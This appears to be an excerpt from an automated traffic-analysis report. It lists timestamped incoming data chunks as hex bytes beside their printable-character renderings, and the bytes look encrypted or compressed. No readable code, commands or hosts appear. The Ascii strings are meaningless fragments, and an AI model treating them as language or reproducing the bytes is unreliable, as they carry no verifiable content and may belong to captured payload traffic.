                                                                                  2022-05-02 11:02:01 UTC104INData Raw: 3e c3 02 53 8b ff 71 90 16 56 c3 79 24 a2 44 65 69 ac 9f e7 87 dc 0c d5 b1 9a 9f 05 40 84 64 53 74 05 1f 83 f5 73 b9 94 10 d0 6b 5b 95 42 c2 68 57 0e 66 8f ea 58 34 c9 da e1 a5 3a 5c b8 a6 71 ba d9 aa 75 0e 31 99 e7 ef 4f f1 09 3b 21 47 76 6a 25 07 63 7d 6c 96 a4 85 0c 91 05 ce 3a b4 b3 19 45 24 79 02 87 39 af ac 75 8c 82 d3 1d 0a 23 50 b1 ff e3 5b f8 1d 4b 40 c4 14 c0 5c 6c 8a 23 57 79 5b aa d1 a5 00 c7 4e f8 c9 b0 26 34 19 e8 5a fc 32 df 42 d8 1e f0 de 7b 13 c6 a1 b7 a0 cb 9c 13 0b b7 45 f3 b7 74 fa 77 85 67 51 24 51 2e 02 2a 54 b1 b9 8c 39 98 56 26 d4 8e 38 bf 18 c7 ae 57 e7 28 f1 12 91 1e 2a 7d e4 cd 05 65 d0 0f 01 c9 8a c3 50 36 7c 7d 2b f3 f0 27 9b 4f 19 b6 08 9a 9b 1f fb fd f4 87 df ad c3 f0 24 ff 40 51 ca 5d 7e 6d ac ab 99 9d da 47 b1 0d 8e d1 3f
                                                                                  Data Ascii: >SqVy$Dei@dStsk[BhWfX4:\qu1O;!Gvj%c}l:E$y9u#P[K@\l#Wy[N&4Z2B{EtwgQ$Q.*T9V&8W(*}eP6|}+'O$@Q]~mG?
                                                                                  2022-05-02 11:02:01 UTC108INData Raw: b1 db a1 3d 0f b3 03 4a e4 01 26 50 29 14 2a 17 21 90 53 97 ff dd 5c be e1 f2 36 5b 7c 87 4e e2 c6 83 56 6d 42 73 ab 79 c8 96 11 1b 57 2f b9 19 e9 60 87 64 47 cc fb e2 cd 24 0e 04 56 eb 16 62 8d 73 c0 4f d2 57 61 ae 90 92 e3 5d d1 a1 39 7d 95 1c 31 7a 8e b5 cc d9 2d 1d 3c eb 90 eb 28 06 d2 90 0a 62 5f 43 e1 6e c2 0b a6 84 66 c8 7a ca 6a 47 ed de b9 e8 c1 c1 41 ea e5 b6 e8 d8 2e 5b ba 40 a0 f6 93 d7 f7 a7 76 a6 de 06 6b 0a 5c 00 18 df b0 2c a9 a5 2f 43 7f b4 70 11 85 58 c9 53 e4 88 2f 98 00 43 8d a5 3d da d6 32 6b e6 38 ff 42 c9 92 83 5b 2e 94 9b 12 55 39 5a d3 8b 3e d2 9d 74 da ea 48 5c 9e ce 42 10 73 0a 7b 02 f8 4f 3c b7 4b 46 08 d7 2a 4d ad c7 40 ac 0a b2 27 2f 2a 18 40 ec 64 65 ce 67 29 85 67 e3 e7 95 da df 21 01 d9 ed 64 ac fc df e7 ce 82 40 74 4b 74
                                                                                  Data Ascii: =J&P)*!S\6[|NVmBsyW/`dG$VbsOWa]9}1z-<(b_CnfzjGA.[@vk\,/CpXS/C=2k8B[.U9Z>tH\Bs{O<KF*M@'/*@deg)g!d@tKt
                                                                                  2022-05-02 11:02:01 UTC112INData Raw: 09 81 6b bf 63 1d a5 ef 3d a9 c1 06 97 d7 b7 03 b2 86 84 0f 05 b6 f3 b6 74 34 55 9f 3a d3 4a 68 16 80 7b ea 62 16 1b 36 af a9 f0 90 b8 a7 2f 2b 2a 84 c5 ed d8 20 e6 6e 9e 9a e3 a5 bd 14 0c ae ac 14 4e 17 60 e2 7e fc 5f a2 dd b6 f6 5f 21 1d fe bd ca bd b7 03 26 c2 94 ea f2 75 c3 18 09 e1 99 80 5c ac 09 e0 a4 3a 00 89 9a a2 b2 4f 5b 97 c7 f7 32 81 4e f6 37 db c6 42 a9 3c 63 c3 e9 51 4e 03 e9 97 fc db ab 5d df a5 b1 f1 65 4c 04 13 b2 df 62 ab 66 38 67 4b 21 9d d7 1e 58 94 37 73 9a 99 42 3e b3 ed ba 49 6b 52 fb 18 cd 5b ce ae bd 3b 3d 85 c0 3b 81 a5 c1 f6 f9 bd 70 6c 72 b8 4f d3 8e 3d 3a 31 f6 ec 1a 67 be 39 cd 1e 49 a7 12 21 b5 f1 77 39 f5 ae 21 2b 96 b2 64 e4 6a 01 0c bb f1 80 c4 4d fa 96 66 86 d6 07 9b cb fb 01 ff 89 76 0b f6 38 1a bb 5c c0 0e 16 22 13 03
                                                                                  Data Ascii: kc=t4U:Jh{b6/+* nN`~__!&u\:O[2N7B<cQN]eLbf8gK!X7sB>IkR[;=;plrO=:1g9I!w9!+djMfv8\"
                                                                                  2022-05-02 11:02:01 UTC116INData Raw: be 42 9e 61 8e 5a 62 83 3c d9 84 f1 98 18 51 a6 84 4e c3 97 8a 45 0c 97 97 51 32 d0 05 8b 6e c7 ac 36 cd 98 d6 0a f5 00 9a d7 d5 e7 27 79 f4 fa 99 c4 84 6a 67 ac 4e 8f b2 29 43 50 cb 07 64 19 15 bd ba 0b 60 ce 66 10 c4 24 0c 0b 3b 52 59 c3 56 32 30 1d fb e7 59 e9 f6 35 7d 94 17 0d 96 fa fb f6 04 de 05 6d 48 58 ba 85 1f fa 1d 7f ee cd 5a bd bc 99 e4 3c 22 aa 5d 64 4e 45 39 b5 15 ca 29 8e 99 bc f2 5b 59 3f d3 62 10 b5 90 f5 b7 40 76 88 81 8b 5c 85 fc 81 54 3e dc fe 5e 4d 5d f6 a1 86 0e 10 5a 52 ae f7 93 3b d1 8f 46 de 14 8f 08 9c e5 81 c4 fd 91 c1 f7 25 9a 1a 8d 98 0a 66 3b 09 ce f2 63 0f cd 9c 67 b3 67 54 de 58 5e 12 f4 17 21 19 43 d3 c8 72 6f 01 c1 c9 84 06 b4 64 b2 33 0e c0 8c 6f f6 6d 12 9d 09 84 59 57 d0 83 e6 74 47 7e 34 98 a0 a8 66 9c 53 fa 43 2d fb
                                                                                  Data Ascii: BaZb<QNEQ2n6'yjgN)CPd`f$;RYV20Y5}mHXZ<"]dNE9)[Y?b@v\T>^M]ZR;F%f;cggTX^!Crod3omYWtG~4fSC-
                                                                                  2022-05-02 11:02:01 UTC120INData Raw: 23 fc bc 6b 30 a8 34 a6 dd 60 98 9f 08 b8 0c 18 a3 1c 13 43 fd 65 26 05 b6 51 0c 0b 89 cf 98 71 3b e5 aa 06 54 9c e9 0e aa 1c 5b 08 5a e7 76 bd e4 c0 29 e0 32 a0 85 13 88 a9 eb 45 6a 9d 99 11 d1 f4 2d 09 b0 ad 4b 14 fe 07 3c 32 46 4f b0 11 f6 01 7c 22 c0 d6 1a 80 0a 20 9d 2f ce eb cf 84 48 3e 0c 47 ff 63 ef 17 c9 ca ce 8d 1b 4a f5 1e fe b2 cf 87 34 ce 6e b2 75 98 13 02 e0 3c 78 6d 3a ac c8 9c 8d f4 1b 39 04 60 f5 f3 c0 c4 1a 96 11 33 cc 26 0b 0b cb 5a 8e 2e ea 2a 92 b0 68 12 32 16 8e 26 fa 4d 34 d7 14 6e 41 2d 3b e3 1d 29 ca 7d 25 d9 f6 60 53 c0 b7 e9 9a f8 ad 3a c9 61 6f 00 54 eb e3 ef 39 1b 47 99 47 52 39 9d e0 56 df b9 16 f1 b2 e7 db ed 0c f5 70 3c d8 2e a7 d4 97 0f 7f 00 4b b8 3b d1 57 4b 60 f1 d4 88 86 1a 77 9e 1b 0f db fb 5c 32 16 95 09 d0 d3 74 9f
                                                                                  Data Ascii: #k04`Ce&Qq;T[Zv)2Ej-K<2FO|" /H>GcJ4nu<xm:9`3&Z.*h2&M4nA-;)}%`S:aoT9GGR9Vp<.K;WK`w\2t
                                                                                  2022-05-02 11:02:01 UTC124INData Raw: 83 7a 75 96 e6 72 ee c4 10 18 ec d5 a9 72 a1 52 f6 fd 54 d1 b8 44 7b 64 9b 43 9f 4c bb 23 7d 18 44 95 d7 70 1c 77 08 26 15 ca 50 2d 88 20 76 c9 75 69 64 77 ec 6b f2 9f 13 77 a3 32 e3 5c a8 0f bf 8a 00 63 87 ea 8c 59 0d ce de ff b8 df c9 b7 93 63 ec 9d 55 23 f3 ae b6 03 ac a8 06 aa 32 b4 af 8c 94 b0 e8 b2 97 a4 c9 7e 1a 30 26 67 af 0b f6 e0 52 af c4 38 35 31 9b 79 3b 53 5a 3e c2 53 5b 00 88 15 3e 74 6d 4f 12 e9 7f b1 dc 1e dd 25 06 c8 1c 3e de fa c6 c0 1f 73 12 4c d3 57 27 bc ca 19 ea 08 ae 45 da 8b 56 66 5f 22 b8 b7 f4 5f 0d 48 2f b9 f7 8f 12 19 99 1a 81 3e 86 95 6f 30 be df 0d 60 7e 35 65 59 b3 81 79 e7 60 e5 0d 43 72 5e 60 9a 50 43 bf d5 4b 62 cd 24 a6 0b 50 d7 d3 f5 af 06 8e 08 b9 9f 2e d1 48 1d 5a 62 fd b2 bb 2c a8 f0 81 fe 8b be a2 fb f4 0d 40 a0 f9
                                                                                  Data Ascii: zurrRTD{dCL#}Dpw&P- vuidwkw2\cYcU#2~0&gR851y;SZ>S[>tmO%>sLW'EVf_"_H/>o0`~5eYy`Cr^`PCKb$P.HZb,@
                                                                                  2022-05-02 11:02:01 UTC127INData Raw: 1b 87 6d 88 7d 06 10 74 da 16 43 f8 cd 4d 1a f9 a2 99 bd 44 04 16 62 f5 37 22 d1 4c 5f 88 58 86 19 ef f2 ac 94 0d 99 52 3c ba bb 08 37 0b 8f 7f 26 ff 29 d1 77 20 ed a1 0c f0 d8 5e 2c 69 6c 45 c5 30 0e 5f 2a 1c 09 b6 71 a5 ce 98 5b 91 4c 1f 7d 59 f2 d1 d9 84 66 6c dd 16 25 33 10 80 04 b8 05 4f 35 78 83 95 bc 72 cd 98 33 94 0e 59 67 cb 99 94 bf aa 64 1c 75 7b 7a e1 2f a6 37 6c fb 05 06 17 9a ba fe f7 f6 25 74 e7 bb c8 19 03 65 0d e2 a3 fd 2f 8b 83 3b fa 13 1e 89 6f 65 13 9d b1 7b 1c a3 95 0b f0 7e f9 d0 19 9d 78 33 f9 64 66 d3 7e 60 b9 bb 6d b8 8b 41 a6 07 7a fe 71 03 6d 10 ee 10 bc c9 e5 04 0c cd 07 65 b5 13 3f 47 54 ab 20 50 ad 07 8d 7a 37 1d 93 ba bb b7 e0 46 c1 c8 05 fc 4f 3b cc 65 cb 21 af ed 88 9f 75 17 11 ed 38 24 29 51 b3 78 a8 24 f3 d8 58 50 4e a4
                                                                                  Data Ascii: m}tCMDb7"L_XR<7&)w ^,ilE0_*q[L}Yfl%3O5xr3Ygdu{z/7l%te/;oe{~x3df~`mAzqme?GT Pz7FO;e!u8$)Qx$XPN
                                                                                  2022-05-02 11:02:01 UTC132INData Raw: 35 64 ed ce f6 a2 8e 79 8c 78 5a 01 26 d6 91 d1 80 5c 06 ae 3f 63 b1 bd 14 38 71 c2 24 d5 6d 38 64 ad 79 e6 ce 40 f0 ae db 8a 50 b6 2d aa 1b 6e f5 71 eb 2d bf d2 a4 d3 44 5c 19 3c d8 77 b4 4a c9 c9 f3 2d 9a 10 af f8 2e 3f db 40 38 c8 df 44 bd f6 7a 56 7f 5c 47 14 4a fe fe 48 eb f8 5b 72 7b df 84 5e f5 33 c4 3f 7c 52 c4 e6 04 d4 3e 22 8c 07 2b 3d d0 df 85 4b fc 69 63 6e c8 a6 0b e6 99 b5 51 3d ef da 48 d3 c1 0a 28 54 c9 4a 49 41 85 ef 22 d2 ba da d8 23 f9 24 cd b2 83 04 b3 64 b3 19 09 ad 66 58 56 d8 4c 0c d7 c6 25 8e 9f 51 38 76 93 f4 51 d4 4e 21 6f b2 33 1a 4a f6 df 29 bf 39 91 05 e9 a1 8e e3 c1 e6 a1 91 63 2b e2 50 c6 f5 5c c9 f4 38 9e 86 a1 15 38 f5 4b dc 4d d6 a6 94 5b d0 36 f8 34 5b 49 bb 22 40 8e 04 6c 15 17 85 c6 01 31 98 7a 2b 65 00 c8 20 9b 32 d0
                                                                                  Data Ascii: 5dyxZ&\?c8q$m8dy@P-nq-D\<wJ-.?@8DzV\GJH[r{^3?|R>"+=KicnQ=H(TJIA"#$dfXVL%Q8vQN!o3J)9c+P\88KM[64[I"@l1z+e 2
                                                                                  2022-05-02 11:02:01 UTC136INData Raw: 96 df 33 6d e0 29 fe 12 60 8d b7 9d 2f 84 ff 16 71 60 70 cf 13 f9 11 92 11 42 15 33 cb 62 49 ef 08 27 f2 b5 2c 9f 27 54 0c 2d 83 58 e5 e5 96 d5 ea ea a3 a5 3f 0a 65 b2 7e 62 16 77 cf 85 c5 bd b2 5c d0 2f 74 ed c7 1a 06 68 fd 0c 48 f2 76 34 9a 84 e3 48 c3 5c 09 86 eb 47 c3 cb 61 dc c5 03 b1 49 c7 87 cb eb f1 06 58 94 56 c2 da a6 66 c0 68 11 e3 7d 7b 08 dc 01 2b 6f d3 b9 4d 86 d6 9b 27 67 50 9d 05 fb b7 42 77 60 d5 37 34 94 e3 5b 5c 87 35 ce f4 42 87 11 19 33 1d 6a ca d4 ae 44 9c c9 57 e8 8d 78 eb ed f9 b0 70 48 62 94 39 60 6d 2c bd 21 03 c0 7c d2 25 49 21 2d 7c 72 20 fa ba 67 5e 6b 43 98 6b 63 d5 79 ea 81 ea d7 bb a4 ab 57 5f 86 aa e6 0c e5 b9 e4 fd 95 b8 92 b2 08 24 b3 a4 f9 c4 72 d1 d0 a0 d3 58 25 d9 17 52 36 3d e8 4c 4b e6 d9 97 58 e8 5d 23 ca 84 6f 33
                                                                                  Data Ascii: 3m)`/q`pB3bI','T-X?e~bw\/thHv4H\GaIXVfh}{+oM'gPBw`74[\5B3jDWxpHb9`m,!|%I!-|r g^kCkcyW_$rX%R6=LKX]#o3
                                                                                  2022-05-02 11:02:01 UTC140INData Raw: 83 e7 a8 0e 94 b0 4c c0 06 ae 2e f7 7c 33 5f 09 c9 fd 85 07 72 01 c7 20 2c 75 41 1e f9 0d 72 b9 14 43 af 11 fa f8 57 fa 23 a3 42 24 e8 04 84 6d 6c 9c 19 12 21 97 d4 a2 40 25 90 b9 76 6b 24 39 c7 84 9d 42 c0 16 c4 91 b6 87 e0 00 df ed 69 17 e4 86 77 40 d2 55 6d 5e 76 3e fb 9a be 1c b8 9d fb 6d a1 8f 34 b2 7b 61 1d 6e 38 f8 e7 ab b4 bf 34 8a ae 29 84 f2 1c 8f f8 64 f4 69 cc 03 de 1b 9f e0 84 1b f6 25 4c 29 ad 7a b0 5e ff d5 36 f2 09 2e fe 03 dd 71 ff df da c0 ec a9 79 a5 bc 62 e8 e6 e4 98 83 eb 77 87 73 73 57 b0 56 1d 38 fc 55 f4 1d b6 46 99 26 da 3e 6a f2 07 14 bb 94 cc e1 07 e5 37 91 38 38 40 5f aa 55 b6 16 a4 f8 8d 03 86 e4 30 c2 ae 2e af d5 82 c1 e3 1c 77 a8 a3 ba dd 91 3f 63 a9 5a 4e 53 75 33 14 15 ac cb f0 6c 4d d6 f0 c9 4c bc 63 89 16 0d f1 c5 79 6d
                                                                                  Data Ascii: L.|3_r ,uArCW#B$ml!@%vk$9Biw@Um^v>m4{an84)di%L)z^6.qybwssWV8UF&>j788@_U0.w?cZNSu3lMLcym
                                                                                  2022-05-02 11:02:01 UTC144INData Raw: d7 e1 53 69 53 05 f7 fd df 8d a3 9d 57 13 06 75 e4 54 81 71 07 b0 68 0d 89 c3 d1 8d 44 dd 55 09 15 6a 16 d1 8e a7 8e 06 99 44 a7 de 39 36 80 15 97 8f 7e 14 12 a9 89 5e 0a 05 6f f5 22 92 b8 ef 00 ee c5 25 76 0c 11 b5 b6 55 8d 7a 4c f6 db d6 c1 7c ba 30 e2 4e 4e 65 53 7d 52 b5 b9 ff 46 99 ea 73 a6 65 39 0a e5 f1 a9 9e 51 21 70 ba 4c 81 d7 1a c8 6d 29 97 46 e3 91 c4 ca 75 85 9a b6 7c eb 80 8b 53 8c 18 75 8b af 3f 24 e1 a3 e1 cc 4a 1b 39 63 20 97 03 3b c8 93 4f dc bb a4 89 cd ad b3 2a a2 15 e6 3d 51 e1 5a 86 cd c2 a3 34 ed 72 b1 c2 63 8b c6 51 22 fd 81 aa 7a b5 66 b5 ff 7c 23 74 1d 20 bf a0 89 06 6d 95 3d d4 6c e6 ec e4 95 b7 c1 9e 86 1d 37 1c 4e ac 63 aa e4 c1 83 03 54 3d c4 ef c1 93 d1 28 75 a2 5d 03 4d 73 5d 0a fd 80 99 2e 2b 59 9e 8a d4 c0 d8 05 8a 65 9d
                                                                                  Data Ascii: SiSWuTqhDUjD96~^o"%vUzL|0NNeS}RFse9Q!pLm)Fu|Su?$J9c ;O*=QZ4rcQ"zf|#t m=l7NcT=(u]Ms].+Ye
                                                                                  2022-05-02 11:02:01 UTC148INData Raw: a3 4c 11 90 ea 5f 1f a1 cd 38 12 92 3c e1 d7 02 f2 67 6a c2 5e 3d 91 ce 2c 62 13 d1 81 ce 1a a7 23 9a 05 23 b8 50 0f f2 ec 1e dc a4 2a a5 30 85 32 ca 37 9d a1 32 1b 29 16 04 78 be 98 9f 98 95 46 e8 21 ad 5f bf a1 fa 54 02 e5 1e b3 02 4a a2 61 63 3a c2 3c 85 5c ee e8 8c 73 b9 59 f0 d1 4a 32 96 90 b6 65 6e f7 e1 d7 d0 37 f3 99 32 28 69 f4 59 92 ab 8b a8 da 89 65 99 c6 4b 1c 97 91 51 1f 3e ea dd e1 d7 df 76 60 ba b1 2a 14 5b 47 ab 10 51 53 89 92 16 eb a8 c4 66 af fe db ce 98 a8 af 81 e6 90 72 86 d2 3a ac 0f 74 1c 3d 1f 42 b3 be 6f 3a 0f e7 5a d6 74 43 d6 26 97 65 02 e6 e6 ef 81 ac e4 3c 82 d2 62 4c a7 48 80 5e b1 06 f7 1d dd 00 5d 41 da 71 3e 25 b7 2f 97 3a 81 8d 1b 2a 0c b4 55 17 66 09 8d 6e 0c 25 7e d9 36 9e 57 8f bb 7d d2 74 ec b6 8f 41 ca 22 dd 33 28 8d
                                                                                  Data Ascii: L_8<gj^=,b##P*0272)xF!_TJac:<\sYJ2en72(iYeKQ>v`*[GQSfr:t=Bo:ZtC&e<bLH^]Aq>%/:*Ufn%~6W}tA"3(
                                                                                  2022-05-02 11:02:01 UTC152INData Raw: ad 4e 36 20 24 f5 44 05 1d 7b 82 9d d0 1b d4 86 d2 29 f8 02 38 85 2c a5 d5 c9 6c 5d 11 75 e7 01 8d 87 ce 02 5f 97 5b 1d 7f 76 e1 6f 96 8f 3d 45 7d cf b7 ea 35 8a 2f 42 a0 6c 11 0c e0 c4 1a 5d 16 df b7 54 38 63 ca 8b 16 8c cf 66 55 70 07 b8 68 0c fe cc 4e 46 87 98 8a 88 2b 20 55 92 3a d4 43 d6 50 e5 b2 e4 6c 24 00 e8 e2 41 ea f0 74 c2 a1 4f fa 5d 71 04 9e 23 90 4a 90 f3 95 35 6c 20 15 15 bc af 5a a9 4b 03 29 aa 00 d5 82 13 1b 24 1c f0 97 53 62 53 a0 89 c6 c6 3b 3e 01 2e 82 ad 89 5f b3 f5 17 35 d3 a1 a5 99 53 85 35 65 dc 74 f1 94 6e f1 bf 3f ac 49 c0 f6 d7 6b f1 ac 4f ca 17 e0 e3 bf bb 30 37 da 1a 30 fc 3a 5a cb ca a9 b8 17 9b eb eb 64 9c 98 15 49 a5 38 98 e6 ae 20 3d 35 5d f8 d6 84 bc 86 a9 63 0a 3d 69 c7 be 17 cc 76 75 52 06 a9 30 7e 97 76 14 1a 11 20 e7
                                                                                  Data Ascii: N6 $D{)8,l]u_[vo=E}5/Bl]T8cfUphNF+ U:CPl$AtO]q#J5l ZK)$SbS;>._5S5etn?IkO070:ZdI8 =5]c=ivuR0~v
                                                                                  2022-05-02 11:02:01 UTC156INData Raw: c9 ae e8 dd ef 66 51 64 4d f1 84 f9 dc 13 42 22 91 65 2d 26 c0 2d 46 36 a6 b5 b2 a0 2b c6 65 7a d8 c1 d7 89 15 cb 0a fa b8 ef 1b 06 47 a5 71 15 12 e8 a2 1c 66 9f b9 84 98 7a 2a 2d f6 c8 24 d0 16 d9 69 80 77 03 94 ea 33 e1 56 36 8a 3b 56 6a b3 3d 16 e2 cf 8d 35 a8 97 4d 66 10 a2 e9 93 5e 06 d2 a3 a9 88 08 c9 81 51 17 76 20 50 64 3a 4d 14 c8 fe 08 de 97 ca c4 22 65 b0 6d 90 6d 84 db 5c 74 1d a7 ff b1 2a 22 6e eb 4c 96 9b 61 76 92 8a 02 b1 fc fc d8 3d 90 08 2a af c5 2a b1 02 25 65 4d 75 52 9d 62 8e 4c e0 05 4d e0 f2 87 cd 1f 2b 7e c9 59 28 37 9e 3c fc fe 0c cf fd 0f 33 48 24 c2 e3 f4 3d f8 bd f3 ab 73 ab 6b f7 38 12 cb ca 43 2e be 9f c7 95 ea 71 53 26 2a de 0a 7d 69 dd e9 80 ec 3f ca 44 64 0c dc 20 9a 69 b3 01 f6 d8 b3 ab d9 5c cd e8 8d 75 bc ef 93 4e 8b dc
                                                                                  Data Ascii: fQdMB"e-&-F6+ezGqfz*-$iw3V6;Vj=5Mf^Qv Pd:M"emm\t*"nLav=**%eMuRbLM+~Y(7<3H$=sk8C.qS&*}i?Dd i\uN
                                                                                  2022-05-02 11:02:01 UTC159INData Raw: 17 97 5f cf 67 a6 bd 1e 7b 6f 93 9a a4 ce 9f 65 29 ee 49 24 33 1f 0f cc b4 d7 7c 51 a9 81 0a 92 22 ec 7e 93 ed c6 16 0f ba b7 ad e1 ce 87 e9 3f 18 cf 8a 38 76 73 7c 40 f9 df 5e 6d 3e b1 82 ae 7f 44 28 38 56 8e 9d 16 28 63 2b a5 ee ac 77 0a c4 5c 4b 0d ec f6 2b 0a ff 3f 61 92 c5 11 a3 e6 d3 58 25 bc 25 fd d3 0e 5c 32 89 ea dd 68 ca fc 8d a1 87 ab f7 30 42 97 9f e3 f0 77 19 65 ad e3 79 15 91 f6 c4 a0 ac 22 e4 54 8d b8 ed 58 05 58 ed 54 9d 59 a5 7e b4 d1 92 a6 cd 75 49 db 9a 64 fa 9c a9 6b 70 f1 96 ac 19 66 a7 4c 41 1b d4 23 99 86 17 76 10 55 16 eb 30 46 dc e5 dd 72 7e d8 cf fd 23 62 e6 be cd 12 1e 73 56 f2 28 f4 39 2d ee cc e8 17 e9 1d 2d 45 e0 51 4e 68 55 8d 74 51 7a ac 24 2d d6 f9 7a ca 4b b4 3e f4 d2 e1 bf 50 5a 8e f8 59 9a 0b b6 4a 8d a9 04 3c cf bb cc
                                                                                  Data Ascii: _g{oe)I$3|Q"~?8vs|@^m>D(8V(c+w\K+?aX%%\2h0Bwey"TXXTY~uIdkpfLA#vU0Fr~#bsV(9--EQNhUtQz$-zK>PZYJ<
                                                                                  2022-05-02 11:02:01 UTC164INData Raw: 99 c6 ae 88 f4 a5 35 f1 50 74 27 8c fa fd 22 7c 02 b3 c9 66 a7 1e fb ca 36 64 dc d8 40 87 83 1a 37 60 c0 83 22 8e 01 e5 22 fc 6e db 67 4a 32 d4 f6 20 88 0e be 29 56 52 72 bd 16 50 6f 41 1f ad 70 9d 25 9d fc 76 25 48 91 c1 d4 0c e6 e1 cf 9b 93 bd 17 9f c1 5c ad 9e bc 39 0f 96 fc 2e f7 0d 20 b2 71 93 3a e9 5f 79 10 67 d0 6d 6d ec 8c 4f 72 0e aa 47 34 1f 89 41 df 42 82 97 3e b3 51 db 46 ea bf 34 05 0a f4 bf fa 70 3e b0 fa e2 a3 8e 6c 56 72 82 13 ba e8 39 f2 5f ba ae af 29 e9 3c 94 1a 4d 0f fd 1a 15 51 ae 33 e1 62 ac a4 93 41 19 2c fd ec 9f a2 72 3e 47 3e 31 97 b5 25 61 1d b8 cb ca e8 02 21 f5 01 f9 0c eb 21 9a 92 99 70 c3 d2 65 7a b5 89 ea 49 92 7a 8e 92 a3 47 a6 84 6c 3d 29 c5 d2 38 43 93 3c a5 0e fd 65 51 3b df 1b 91 f9 c9 3c 01 8d f5 a0 c6 2d 25 38 35 cb
                                                                                  Data Ascii: 5Pt'"|f6d@7`""ngJ2 )VRrPoAp%v%H\9. q:_ygmmOrG4AB>QF4p>lVr9_)<MQ3bA,r>G>1%a!!pezIzGl=)8C<eQ;<-%85
                                                                                  2022-05-02 11:02:01 UTC168INData Raw: e3 e2 93 4e a7 ca c1 4a 9b 1e a9 c2 79 2e 65 a6 d7 5f 9d 5f 0d 32 b9 c8 36 e6 0f 13 a4 44 4a a8 be 34 73 3f 41 16 61 51 bf a5 a1 b1 99 5b 98 0f 9c b2 d5 07 6c 90 4e 59 22 0f 10 b7 f8 2f ac 89 32 79 d1 fc 52 0b 2c b3 d8 26 68 59 53 9c da d6 36 19 a2 45 5b 72 03 4b 10 f1 c3 eb c3 d5 0a 3d 26 4d a2 70 3d e5 4e b2 41 7a ce de b7 fc 2e 27 ad 8b a1 87 8a 8a a5 ce cd 31 7b 9a c8 45 ec 0c c5 4f 1e 64 8a 11 79 62 2a a5 f1 40 b8 01 fe 8d 54 3d a6 18 3d 45 bb 69 12 9c 52 48 27 99 96 a9 8a 71 a6 3e e8 69 6d 9d 2a 41 08 29 41 6d f3 08 e3 3c 06 da 2f 9c e9 28 b8 b2 04 15 b8 db 9d 31 eb 1e 05 bf 31 7f 28 01 2f bd 8e dd 67 73 2b 10 a0 40 0b 34 a6 bc 8c 75 92 16 dd 99 f9 02 d9 f4 95 bc da 38 b2 28 35 51 ba 0a b9 70 0a e0 32 d0 75 93 77 a2 4a c4 32 ab a7 c2 86 63 77 c4 2f
                                                                                  Data Ascii: NJy.e__26DJ4s?AaQ[lNY"/2yR,&hYS6E[rK=&Mp=NAz.'1{EOdyb*@T==EiRH'q>im*A)Am</(11(/gs+@4u8(5Qp2uwJ2cw/
                                                                                  2022-05-02 11:02:01 UTC172INData Raw: f9 e6 4a 80 43 63 3b d9 23 db 15 b1 42 a9 a8 96 f9 e7 7a 11 57 ae 00 b5 77 23 26 79 de 69 da 55 40 59 4d 5f 1b 47 19 c5 ef 1d 39 81 77 66 f3 36 a0 af c5 b7 a7 72 3b 9f e0 db 8d fc d2 bf 88 bb 54 be 2b 52 cc 16 e1 ee 71 1f d8 7a 27 0e 5f 9d ed 8e 88 8b 2f fc 29 39 ce 0f 08 b2 4b 75 5a 77 a7 bc ce fb 7f 68 45 ab d3 1d 6a 41 f4 e5 10 6f be 73 0a 50 4e 19 23 71 11 b3 74 d8 ec ff 07 74 df 52 c5 79 0d 71 94 58 6d a9 3f ef 7b 06 22 b8 1f d1 1c b3 c3 9a 53 13 fd 68 ef 2d 5a ef 2d 8b 7f 7c 82 6f 39 14 b4 e9 51 cc 80 d2 68 fc 62 4a 99 7a 50 f5 ea 44 a4 24 ed 7a 88 2e 99 c7 84 fa 19 39 c2 d5 60 b9 f6 1c 19 ce d0 a4 11 18 40 c0 e2 f7 b8 2c 34 c8 08 d1 85 2b a5 17 0c 8d 18 f6 48 30 1c 5e c0 8b ef ed 74 a8 76 b4 93 56 24 16 92 0d 23 9c 09 b2 dd 69 c9 ac 66 09 9e 16 f3
                                                                                  Data Ascii: JCc;#BzWw#&yiU@YM_G9wf6r;T+Rqz'_/)9KuZwhEjAosPN#qttRyqXm?{"Sh-Z-|o9QhbJzPD$z.9`@,4+H0^tvV$#if
                                                                                  2022-05-02 11:02:01 UTC176INData Raw: cc ff 17 b5 3d c2 c0 03 bf 75 48 6e fb 14 59 88 aa 4d ba 0e cc 4f d8 2b 92 99 4c 30 8d 38 6f 0e e8 f8 35 b8 35 1f 91 4d a2 8b 7f 6e 31 e4 d7 71 ee e4 b3 84 3b 2e df c4 4f 11 1e 58 fe 87 cb 5a de 2b 40 83 a5 e3 fd c1 2a 36 e9 1a 08 b2 1f 55 af 97 fb 61 3b e0 10 8a 02 90 94 91 78 30 3a fe f0 f9 eb 89 fd 57 28 18 46 0c 55 29 48 ed 96 c6 b9 88 16 b4 8a 6a d8 10 4c b4 ba 37 51 c1 c1 d9 a5 8a 0d 40 5b ec ed a7 e3 a0 01 36 c4 63 4a 67 48 1e e7 62 26 83 f9 b1 31 a0 3c 68 87 83 9d fd 7e f8 4d a5 5a 13 c3 b9 73 11 b0 b8 3f 05 ef 8b 73 c4 c3 c2 b1 9f ba 9b 01 c4 0a 12 74 6b c6 e4 34 a0 48 a0 29 9d 7d 3f 30 9c d5 c9 2d e9 f7 af 1b 67 85 f4 a0 a5 36 51 3d 16 ac e2 25 02 2d 41 b8 76 a2 a8 09 39 54 4e 50 52 d0 64 b6 e3 78 de 77 be 31 d4 de 7d f1 7b ef e6 e2 3b 7d 44 e1
                                                                                  Data Ascii: =uHnYMO+L08o55Mn1q;.OXZ+@*6Ua;x0:W(FU)HjL7Q@[6cJgHb&1<h~MZs?stk4H)}?0-g6Q=%-Av9TNPRdxw1}{;}D
                                                                                  2022-05-02 11:02:01 UTC180INData Raw: ac 7f 19 c4 a7 da 0b cf ab 1e ca 83 e8 2b d2 43 cc 53 72 6b 62 08 f5 ce 3d aa cb 70 90 5b 2b b1 13 9b 86 2a d0 91 da 2b 0a 3e fe 48 19 59 4e 98 16 d6 5e 19 0f f9 23 9e 09 f3 d2 47 a6 4a 83 08 8e d5 62 55 80 3b 58 8a 81 c3 0c 04 1e db 33 e2 fe 0c 00 7b 6a e8 13 ed c7 76 e1 f9 8a a0 a8 ce bb a9 12 37 6c 35 d3 1f 4f 43 6f 6b aa 37 0b f6 b1 a3 65 98 47 49 ea 4c f4 b4 37 a9 b6 95 79 39 91 6f a6 e0 89 68 01 3d 3e 3c 79 fd 26 09 b4 3e fc 86 b7 8a 78 b5 1a 62 47 6a 83 eb 9a 57 bd b3 85 e0 e8 dd ba c3 05 25 19 b0 cf da 0a a0 77 28 d5 da a4 61 79 ce cf 2c 27 7b 7b ec ce e9 ed 10 b1 50 c6 71 3d 46 12 ec c2 c4 44 9c 37 8e 6d 34 04 62 03 f1 9b c4 1f ea f6 